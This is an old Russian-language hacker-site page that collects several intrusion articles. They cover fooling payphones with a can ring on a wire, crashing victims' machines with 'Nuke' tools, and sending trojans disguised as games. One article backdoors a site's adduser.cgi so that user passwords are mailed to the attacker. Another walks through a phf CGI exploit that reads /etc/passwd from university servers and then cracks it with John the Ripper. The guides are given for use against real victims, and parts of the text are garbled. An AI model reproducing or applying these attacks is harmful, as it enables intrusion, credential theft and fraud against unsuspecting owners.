XACKER
|
|||||||||
СТАТЬИ
|
|||||||||
Вернуться
в МЕНЮ
|
|||||||||
Получение
root доступа через symlink
|
|||||||||
Иследование
и взлом роутеров
|
|||||||||
Взлом
таксофона
|
Я хочу предложить
довольно старый, но очень надежный и простой способ позвонить по таксофону
на "халяву". Все что вам для этого нужно, это купить (или найти)
банку от газировки и отломать от неё кольцо-открывалку. Для того чтобы закрепить кольцо-открывалку, нам понадобится проволока. Проволоку выберите сами, после того, как дочитаете главу. Следующий тап - это прикрепление проволоки к кольцу-открывалки (этот этап самый важный). Вы должны приделать проволоку так, чтоб она не мешала проходить кольцу внутрь таксофона. Для этого надо провести проволоку в маленькую дырку и закрепить её там. Но если проволока слишком толстая, то можно побить её молотком, и она станет тонкой (это можно сделать также, чтоб проволока держалась лучше). После всех проделанных процедур эта штуковина будет служить вам вечно. Это отличный способ звонить по таксофону совершенно бесплатно! |
Если
вы хотите сломать чей-то компьютер, или полазить по нему через инет, то
вам необходимо сделать несколько операций. Для начала, вам необходимо узнать
IP адрес и порт жертвы. Что такое IP? Каждая машина, подключаем к Интернету,
получает свой IP адрес. Он нужен для того, что бы информация правильно доставлялась
от одного адреса другому. Что бы сетевые программы знали, кому из них предназначены
поступающие пакеты, введено понятие портов протоколов более высокого уровня.
Что бы узнать IP жертвы существуют множество программ, эти программы ты
можешь скачать у меня на сайте, в разделе программы. После того как ты узнаешь
IP жертвы, ты сможешь его повесить по полной программе, но для этого необходима
программа под названием Nuke. Что такое Nuke? Nuke это простая программа,
которую ты сможешь скачать у меня, в разделе программы. Он посылает всякий
мусор на тот или иной порт. Для того, что бы вы могли в лесть на комп. жертвы вам необходим Троянец. Его ты тоже можешь скачать у меня , в разделе программы. Для того, чтобы подключиться через Net, тебе не только нужен будет IP и порт врага, а специальный Patch, который должен быть установлен на компьютере жертвы. Ты можешь прислать это Patch ему по почте, сказать, что это какая-то игрушка, или ещё что ни будь, короче лапшу на уши повесишь. А потом соединяешься с ним по IP и порту и весь КОМПЬЮТЕР В ТВОЕМ РАСПОРЯЖЕНИИ!!! |
Каждый день не зависимо от
погоды в мире находят новые дырки в программном обеспечении серверов. Подавляющее
большинство подписчиков на такие форумы как BugTraq, NTBugTraq и т.д. как
было сказано в какой то статье люди именующиеся Script Kiddies начинают
шерстить просторы необъятной сети интернет в поисках легкой наживы. В подавляющем большинстве случаев найдя какую либо дыру в системе безопасности не долго задумываясь они просто на просто делают смену начальной страницы ( если это Web сервер ), делают так называемый Deface , и сразу же рассылают этот deface на сайты , специализирующиеся на сборе информации в этой области. Они часто не замечают тонны полезной информации , которую можно выудить с сервера. Я говорю о паролях доступа в интернет ( не мало серверов имеют X.25 PAD , который позволяет входить в интернет через Sprint Net или SitaNetwork) , пароли доступа к приватной информации ( это даже может быть не секретная информация а пароли к различным ресурсам на сервере ) , наконец номера кредитных карт , самое распространенные удаленные Shell т.д. Так что задумайтесь ! Стоит ли делать Deface сайту или намного выгоднее добыть с него необходимую вам информацию и умыть руки ? Иногда доступ к этой информации можно получить напрямую ( скачать passwd , Sam …..) , но зачастую этого нельзя сделать . Но не стоит расстраиваться ! Есть выход и из этой ситуации . Рассмотрим пример сайт , допустим порнографический , достучаться до базы паролей по той или иной причине не удается . Но есть скрипт , добавляющий пользователя в базу и при этом отсылающий пароль ему на Email. Если у вас есть возможность заменить файл на сервере , а именно такую ситуацию я и привожу, то можно пойти двумя способами : 1) Сварганить скрипт по образу и подобию скрипта на сервере , который при запуске просто добавит ваше собственную учетную запись в базу и ищи свищи в этой куче вас ! 2) Второй же способ , поправить исходный скрипт таким образом , что бы он посылал Email не только зарегистрированному пользователю но и на ваш почтовый ящик. Правда существует и третий способ : это комбинировать первый и второй. Итак вот кусочки скрипта который поддается правке на одном из Web серверов на основе Microsoft IIS 4.0 ( все конечно рассмеялись мол UniCode ! Lamo !) Я не рассматриваю как пользоваться этой дыркой , про это уже написано уйму материала в том числе и на нашем сайте , дырка может быть любая ! Это лишь маленький пример ее грамотного использования. И так скрипт adduser.cgi ####################################################################### Покусано за ненадобность приводить
лишний текст , ясно что с самом скрипте ####################################################################### Здесь подсоединялись необходимые библиотеки .Покусано ! ####################################################################### Получение данных из формы . Покусано. ######################################################################### Проверка на существование
вашего Email в black List 'e ! :) Можно кстати Здесь было ( нетрудно догадаться
из названия) вычисление даты истекания ########################################################################### Преобразование. Покусано ! Здесь генерируется пароль
пользователя . Можно поменять на какой ни будь свой. ########################################################################### Секция подавления пользователя
в базу ! ########################################################################### Ну вот нужная мне секция .
Я решил пусть все пароли и мне на Email приходят, $email_body .= "Thank
you for joining трали вали site Please write down $email_body .= "Enjoy your visit at трали вали site !\n"; $admin_email = "lamo@lamo.com"; Вот к этой строке добавляем
еще одну . open (MEMBER, ">>c:/inetpub/scripts/Members/$form_data{'email'}.user")
print MEMBER "$email_body"; if ($form_data{'autobill'}
eq "NO") exit; Ну вот собственно и все !
Ниже идут процедуры используемые скриптом sub valid_address sub page_header Цель которую я преследовал
при написании этой статьи , это дать понять некоторым личностям , что
Deface сайта это не цель ! Можно выудить очень много интересного если
постараться ! И еще одно ! Не надо делать оценки какой либо группы по
количеству Defac'ов . Их можно сделать хоть 250 за один присест особо
не напрягаясь (все ограничивается скоростью вашего модема) ! Если кто
сомневается могу показать :) |
Вот интересная
статья наверное получится , здесь про все , coding, debugging , … Ну обо
всем по порядку. Шел 199x год начал бурно развиваться интернет, одна очень
известная компания предоставляла халявный доступ в интернет. Потом халявный
интернет чуть чуть обрезали. И началось общение на локальных веб серверах
пользователей. Тогда я первый раз столкнулся с Sambar Server'ом . Один мой
друг разрекламировал его, мол ты что клевый сервер ! и все такое. Взяв у
кореша этот программный продукт, я начал знакомство с ним. Дальше знакомства
у меня дело не зашло и я про сие творение человеческого ума забыл. Но время
шло , росли и мои навыки в области "отладки" программ SoftIce'ом
и так далее. Как и все начинающие в этом деле я стремился стать похожим
на таких гигантов как UCL. Общался в irc , знакомился с интересными людьми,
начал интересоваться дырками в операционных системах и программном обеспечении.
Ну и попалась как то мне в руки база паролей от этого Sambar Server'а. John
The Ripper показал мне с экрана большой символ во весь экран, типа пошел
ты с этой базой куда подальше не понимаю я ее. Все мои поиски какой либо
софтины подходящей под мои надобности окончились неудачей. И я решил поковырять
этот сервачок. Первые мои попытки взять быка за рога не увенчались успехом. И огонек энтузиазма начал по тихоньку тлеть. Но вдруг , наверно напившись пива в усмерть, я заметил одну клевую фишку. В разделе администрирования пользователей , при просмотре учетных записей, количество букв в пароле СОВПАДАЛО с количеством звездочек выводимых на экран. Обана ! Поковырявшись в html файлах. Я нашел строку следующего содержания: Current Password Поменяв ее на Current Password И перезапустив сервер. Я с
радостью для себя увидел пароли пользователей ОТКРЫТЫМ текстом. Вот оно
! Я сам нашел дырку в программном обеспечении ! Да я понимал, что она
не даст мне удаленно администратора или root'а , но это была дырка ! Imports from sambarcm.dll |
Внимание! Этот
материал, как и все остальные, создан для того, чтобы показать обленившимся
администраторам WEB-серверов на самые распространенные дырки, которые им
лень заткнуть (хоть это и их прямая обязанность). И именно из-за их лени
любой человек за 15 минут может сломать их сервер. Ты не умеешь кататься на роликах - последняя попытка окончилась тем, что ты сломал обе ноги о слишком высокий парапет. Ты не умеешь писать программы - твоя первая и последняя программа, написанная на Нортон Коммандере, убила тебе материнскую плату и спалила монитор. Ты не разбираешься в музыке - по-прежнему думаешь, что Мэрилин Мэнсон это участница группы Spice Girls? И Родригеса ты знаешь только потому, что он будет жить еще долго? Из всего этого следует, что тебе катастрофически не дают. Обидно, но это легко исправить - стань хакером. Тебе понадобится IRC-клиент (бери любой, тебе там надо выполнить только пару команд), а также на ftp.technotronic.com в разделе "rhmo9-products" возьми программульку под названием Grinder - он ищет указанный тобой файл в диапазоне DP и показывает права на него. Также нужен подбиратель юниксовских паролей John the Ripper (любой поисковик даст тебе миллиард ссылок на него). А в квадратных скобках я буду указывать, что надо писать. Что же будем ломать? Систему того придурка, который, получая зарплату за защиту сервера, ни хрена для этой самой защиты не делает. Читай внимательно и учи - этот абзац * ты будешь впаривать девушкам на вечеринках. Есть такое понятие - cgi-скрипты, зачем они нужны и как они устроены, слишком долго объяснять и совсем не обязательно. И одна из самых первых ошибок, обнаруженных в этих скриптах, был т.н. phf bug, ошибка скрипта phf, позволяющая выполнять удаленному юзеру любые юниксовские команды на web-сервере. Ошибка была найдена еще в 96 году, но, не поверишь, до сих пор хватает серверов, которые про нее не слышали! Что ж, есть старая русская пословица - "Гром не грянет - мужик не перекрестится". Запускай IRC-клиент и коннектись к любому серверу (только не вздумай делать то, для чего IRC и был создан - для болтовни, иначе на эту самую болтовню уйдет остаток твоих дней и денег на счету). Самая плохая защита всегда на больших университетский серверах, там годами не обновляется программное обеспечение, а админы настолько обпились пива, что просто забыли о том, что баги надо хоть иногда фиксить. Поэтому смело вводи команду [/who *.edu]. Перед тобой список юзеров, использующих университетский сервер для выхода в Интернет. ОК, бери любого попавшегося (лучше первого) юзера, например, Jagaast 666@jagaast.jj.rhno.columbia.edu:2 Jagaast Iz'Merl (*). Юзер Jagaast пока не знает, что именно он будет Павликом Морозовым, но, думаю, он так и умрет в неведении. Следующая команда - [/dns Jagaast]. Этим ты узнаешь его IP (например, 194.52.14.102 ). Теперь запускай Grinder, он предлагает тебе поискать файл /index.htm[rl]. Зачем нам этот файл? Стираем на фиг и вместо него пишем [/cgi-bin/phf.cgi] и диапазон IP от 194.52.14.1 до 194.52.14.256 (для тех, кто в танке - это диапазон, в который попадает наш Jagaast). Ждем... Есть два варианта. Первый: Grinder пишет URL found. Второй - все остальное. Угадай, какой вариант более благоприятещ# Вот, если fouhd, запоминаем (записываем адро$, где он был ftnrnd (например, 194.52.14.25)) и мчимся к броузеру. В окошке броузера стирай свою любимую надпись http://www.porno.com и пиши (внимательно, не ошибись!): [http://194.52.14.25/cgi-bin/phf?Qalias=%ff/bin/cat%20/etc/passwd]. О Боже, что это?!! Файл passwd прямо в окне твоего броузера! Это все, что тебе надо, сохраняй его и суй прямо в руки старику Johriy (который The Ripper). Прочитав read, me, ты разберешься, чего там делать, это не так сложно. И вот у тебя лист с паролями. Берешь его, суешь в задний карман штанов и идешь на вечеринку. Если вы там не глушите водку, то вы толпитесь у компьютера, вот здесь ты и можешь показать все, на что способен. Лениво прищурив глаза и ухмыльнувшись, ты достаешь листик с паролями, говоришь "пустите-ка меня". Входи по ftp на сервер, который ты ломанул. Иногда поглядывая в волшебный листок, неторопливо вводи пароли. Вошел? Теперь можешь закурить или открыть бутылочку пивка и процедить: "Вот, вчера хакнул. Пользуйтесь". Теперь отойди и сядь в уголке. После того как толпа, собравшаяся вокруг тебя, поутихнет, выдай им тот абзац, который я советовал тебе заучить. Когда потерявших сознание унесут, обязательно найдется какой-нибудь козел, который начнет задавать тебя умные вопросы (как правило, это владелец компьютера). Можешь его внимательно выслушать, не перебивая, а когда он закончит, быстро-быстро (слушая Busta Rhymes и Jay Z, учись) начинай цитировать ему книгу Фигурнова "ЮМ PC для пользователя", также известную в узких кругах как "Библия Хакера". После того как настырный хозяин прыгнет в окно, вечеринка продолжится с новой силой. Ну и теперь тебе любая девчонка обязательно даст! |